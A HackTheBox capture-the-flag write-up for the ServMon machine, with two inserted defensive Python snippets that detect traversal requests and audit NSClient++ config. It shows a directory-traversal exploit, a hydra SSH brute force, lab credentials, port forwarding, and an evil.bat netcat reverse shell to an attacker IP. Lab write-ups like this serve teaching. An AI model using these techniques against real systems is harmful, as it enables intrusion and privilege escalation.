Writeups of HackTheBox retired machines
2.1- nmap scan
2.2- FTP Browsing
4- Privilege Escalation
4.1- Post-Compromise Enumeration
4.2- Post-Compromise Exploitation Part 1 - Web Server Connection
4.3- Post-Compromise Exploitation Part 2 - Script Execution
First things first, we begin with a
First, what do we have here?
dirbuster to have a look at the directories and files we may find.
As we know we can log in to the FTP server, let's try it and log in using the credentials anonymous:anonymous:
root@kali:~# ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.
ftp> dir Nadine
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:08PM                  174 Confidential.txt
226 Transfer complete.
ftp> dir Nathan
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:10PM                  186 Notes to do.txt
226 Transfer complete.
We download these two files and examine their content:
Of course, we don’t have Nathan’s creds at the moment, but we can search for NVMS.
Googling information about NVMS, we find on the product page http://en.tvt.net.cn/products/188.html that NVMS-1000 is a monitoring client which is specially designed for network video surveillance.
In the “Features” section, we can read the following: “Brand new user interface: Main panel as the unified entry, clearly classifies the main functions. Each function adopts dynamic Tab label for easy operation. Preview window has embedded toolbar and right-clicking menu; adopts accordion tree view control.”
We understand that there might be a web server and an interface installed on the machine. We easily find it by browsing to http://10.10.10.184, which redirects here:
When we googled NVMS, we also noticed a link to EDB: NVMS 1000 - Directory Traversal - https://www.exploit-db.com/exploits/47774.
Using it is as simple as putting the request in Burp Repeater and clicking “send”. Testing it with C:\windows\win.ini is nice, but we are interested in the passwords file we read about. Let's see whether we can read this file using the exploit:
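From the defender's side, the traversal requests used above leave a clear trace in the web server's access log. The following detection logic is an added example, not part of the original writeup: it parses Common Log Format lines (a constructed sample, not real traffic from the box), normalises percent-encoding and backslashes so double-encoded or Windows-style variants are not missed, and rates a traversal request that got a 200 higher than one the server rejected.

```python
import re
from urllib.parse import unquote

# Common Log Format: src ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Files typically read first to confirm a traversal works (win.ini is the one used above)
SENSITIVE = ("windows/win.ini", "windows/system32/drivers/etc/hosts", "windows/system32/config")

def normalise(path: str) -> str:
    """Decode percent-encoding until stable (catches double encoding), unify slashes, lowercase."""
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    return path.replace("\\", "/").lower()

def classify(line: str):
    """Return a finding for a traversal-looking request, or None for a benign line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = normalise(m.group("path"))
    depth = path.count("../")
    if depth == 0:
        return None
    status = int(m.group("status"))
    return {
        "src": m.group("src"),
        "depth": depth,
        "status": status,
        "target": next((s for s in SENSITIVE if s in path), None),
        # a 200 on a traversal request means the server most likely served the file
        "severity": "high" if status == 200 else "medium",
    }

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (not real traffic from the box)
SAMPLE = """\
10.10.14.23 - - [27/May/2020:17:30:01 +0000] "GET /Pages/login.htm HTTP/1.1" 200 4312
10.10.14.23 - - [27/May/2020:17:30:09 +0000] "GET /../../../../windows/win.ini HTTP/1.1" 200 92
10.10.14.23 - - [27/May/2020:17:31:40 +0000] "GET /..%5C..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts HTTP/1.1" 200 824
10.10.14.50 - - [27/May/2020:17:32:02 +0000] "GET /%252e%252e/%252e%252e/windows/win.ini HTTP/1.1" 404 0
""".splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```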
Now, we just have to put our users Nadine and Nathan in a file “users.txt” and the passwords in another file “passwords.txt”, and run hydra to test which credentials are valid for an SSH login:
I love it when a plan comes together.
The creds we were looking for are nadine:L1k3B1gBut7s@W0rk.
Before using a privesc reporting tool like WinPEAS, I usually look around for anything obvious.
I first look at the account permissions with the “whoami /all” command, but there is nothing particular here: Nadine has a low-privileged account.
Then I look at the directories, and this time we notice an unusual one: “C:\Program Files\NSClient++”. It corresponds to the application mentioned in Nathan's text file.
Google is our very best friend (when they don't spy too much on their users in “private mode” :joy: but whatever…).
We find a link to its website https://nsclient.org/. “NSClient++ is an agent designed originally to work with Nagios but has since evolved into a fully fledged monitoring agent which can be used with numerous monitoring tools (like Icinga, Naemon, OP5, NetEye Opsview etc).”
There is also a link to its documentation: https://docs.nsclient.org.
Exploit-DB is our second best friend.
Here is what we find: NSClient++ 0.5.2.35 - Privilege Escalation - https://www.exploit-db.com/exploits/46802
Reading the exploit, there is a 7-step process which requires an attacker to have local access to a system running NSClient++ with its web server enabled.
At the first step, it is written that we may grab the administrator password from the file C:\Program Files\NSClient++\nsclient.ini. Let's have a look at this file :eyes: :
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help

; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1
...
OK. We have a password, and the “allowed hosts” parameter confirms that we need local access to the machine. So, how and where can we log in?
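The two findings in that file (a plaintext admin password and a web server bound to localhost) only become a privilege escalation together with the modules enabled later in this writeup, which let a web-UI admin run scripts as the service account. The audit below is an added example, not part of the writeup or of NSClient++: it parses an nsclient.ini modelled on the one shown above (constructed sample, placeholder password) and reports those conditions. The [/settings/default] keys are the ones the page shows; the [/modules] section and the [/settings/WEB/server] port key follow NSClient++'s documented layout and are assumed here.

```python
import configparser

# Constructed sample, modelled on the ini layout shown above (password is a placeholder)
SAMPLE_INI = """\
; in flight - TODO
[/settings/default]
; Undocumented key
password = ExamplePassw0rd
; Undocumented key
allowed hosts = 127.0.0.1

[/modules]
WEBServer = enabled
Scheduler = enabled
CheckExternalScripts = enabled

[/settings/WEB/server]
port = 8443
"""

# Modules that let a web-UI admin define and run commands as the NSClient++ service account
SCRIPT_MODULES = ("CheckExternalScripts", "ExternalScripts", "Scheduler")
LOCAL_ONLY = ("127.0.0.1", "::1", "localhost")

def load_nsclient_ini(text):
    cp = configparser.ConfigParser(interpolation=None, allow_no_value=True)
    cp.optionxform = str                    # keep key names as written
    cp.read_string(text.lstrip("\ufeff"))   # drop the UTF-8 BOM that 'type' prints as garbage
    return cp

def enabled(cp, section, key):
    return cp.has_section(section) and cp[section].get(key, "").strip().lower() in ("enabled", "1", "true")

def audit(cp):
    """Return (severity, finding) tuples for the escalation path described in this writeup."""
    findings = []
    default = cp["/settings/default"] if cp.has_section("/settings/default") else {}
    password = default.get("password", "").strip()
    hosts = [h.strip() for h in default.get("allowed hosts", "").split(",") if h.strip()]
    web = enabled(cp, "/modules", "WEBServer")
    scripts = [m for m in SCRIPT_MODULES if enabled(cp, "/modules", m)]
    port = cp["/settings/WEB/server"].get("port", "8443") if cp.has_section("/settings/WEB/server") else "8443"

    if password:
        findings.append(("high", "admin password stored in plaintext; anyone who can read nsclient.ini can log into the web UI"))
    if web and any(h not in LOCAL_ONLY for h in hosts):
        findings.append(("high", f"web server on port {port} reachable from {hosts}"))
    elif web:
        findings.append(("medium", f"web server on port {port} limited to localhost, but any local shell (e.g. SSH) can reach or forward it"))
    if web and scripts:
        findings.append(("critical", f"modules {scripts} let a web-UI admin add and run scripts as the service account"))
    return findings
```

Fixing the file ACL so only administrators can read nsclient.ini removes the first finding; disabling the script modules (or the web server) when they are not needed removes the last.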
As we have local low-privileged SSH access, we may try using this compromised Windows machine to set up port forwarding.
With SSH, we access the Windows machine on its port 22, and we want to get to the NSClient application port. But which port is it?
We look for the port number on the documentation site and get the information we need at https://docs.nsclient.org/reference/generic/WEBServer/#port-number:
Now, we know the port is 8443. We can use the following command to connect to the web application page:
root@kali:~# ssh -N -L 0.0.0.0:8443:127.0.0.1:8443 nadine@10.10.10.184
Let me explain:
We execute an ssh command from our attack machine. We will not run any remote command (-N) but will set up port forwarding (-L), binding port 8443 on our local machine (0.0.0.0:8443) to port 8443 on the target (127.0.0.1:8443), through a session to our original target 10.10.10.184, logging in as nadine.
Once we understand this, we may want an easier way to use this command, a “fire and forget” mode where we don't have to enter the password. Let's give this one-liner a try:
root@kali:~# expect -c 'spawn ssh -N -L 0.0.0.0:8443:127.0.0.1:8443 nadine@10.10.10.184; expect "password:"; send "L1k3B1gBut7s@W0rk\r"; interact'
Now we can connect to the application:
We should keep an eye on the Exploit-DB page and follow its instructions:
“2. Login and enable following modules including enable at startup and save configuration:
-> Scheduler”
These modules are already enabled:
Now, the plan is to upload a script to get a reverse shell and make the NSClient application run it as Administrator. “3. Download nc.exe and evil.bat to c:\temp from attacking machine”
We create the file evil.bat with the following content:
@echo off
c:\temp\nc.exe 10.10.14.23 443 -e cmd.exe
And we set up a web server or an FTP server on our attacking machine to transfer the files “nc.exe” and “evil.bat” to the target. If we choose to set up an FTP server:
root@kali:~# systemctl start pure-ftpd
From the target, we connect to the FTP server and download the files:
nadine@SERVMON c:\Temp>ftp 10.10.14.23
Connected to 10.10.14.23.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 18:33. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
504 Unknown command
User (10.10.14.23:(none)): fred
331 User fred OK. Password required
Password:
230 OK. Current directory is /
ftp> get evil.bat
200 PORT command successful
150 Connecting to port 51951
226-File successfully transferred
226 0.000 seconds (measured here), 417.48 Kbytes per second
ftp: 53 bytes received in 0.00Seconds 53000.00Kbytes/sec.
ftp> get nc.exe
200 PORT command successful
150-Connecting to port 51962
150 58.0 kbytes to download
226-File successfully transferred
226 0.068 seconds (measured here), 0.83 Mbytes per second
ftp: 59584 bytes received in 0.10Seconds 572.92Kbytes/sec.
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 59 kbytes.
221 Logout.

nadine@SERVMON c:\Temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of c:\Temp

27/05/2020  17:34    <DIR>          .
27/05/2020  17:34    <DIR>          ..
27/05/2020  17:34                53 evil.bat
27/05/2020  17:34            59,584 nc.exe
               2 File(s)         59,637 bytes
               2 Dir(s)  27,869,081,600 bytes free
Next step of the process:
“4. Setup listener on attacking machine”
root@kali:~# nc -nlvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Then (we are almost done):
“5. Add script foobar to call evil.bat and save settings”
We go to the “Settings” menu and click “Add new” to add our script “evil.bat”:
Step 6 proposes to schedule the script, but clicking the “Control” button in the upper-right corner allows us to restart NSClient; then we just have to run our script from the “Queries” tab using the “myshell” button (the one we set when adding our script):
We have our shell!!
And we can grab the root.txt file:
Be Curious, Learning is Life !